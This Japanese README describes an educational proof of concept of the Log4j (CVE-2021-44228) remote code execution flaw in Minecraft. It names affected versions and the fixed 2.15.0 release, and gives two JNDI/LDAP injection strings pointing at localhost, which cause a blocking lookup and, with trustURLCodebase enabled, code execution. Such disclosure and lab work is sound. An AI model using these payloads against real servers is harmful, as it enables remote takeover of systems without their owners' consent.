
MinecraftにおけるLog4jの脆弱性(CVE-2021-44228)に関する教育目的のProof of Concept
このプロジェクトは教育目的のみです。
これは HyCraftHD から流用した log4j RCE の概念実証です。
CVE-2021-44228 に関するリンクは以下の通りです:
このバグはほぼすべての log4j2 と一部の log4j1 バージョンに影響します。使用推奨バージョンは 2.15.0 で、これはこの脆弱性を修正します。
${jndi:ldap://127.0.0.1/e} を貼り付けます。ポート 389 に開いているソケットがある場合、log4j は接続を試み、タイムアウトが発生するまで以降の通信をブロックします。THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT! が記録されます。これは ldap サーバーからのシリアライズされた文字列オブジェクトです。
${jndi:ldap://127.0.0.1/exe} を貼り付けます。-Dcom.sun.jndi.ldap.object.trustURLCodebase=true が true に設定されている場合、リモートコード実行が発生します。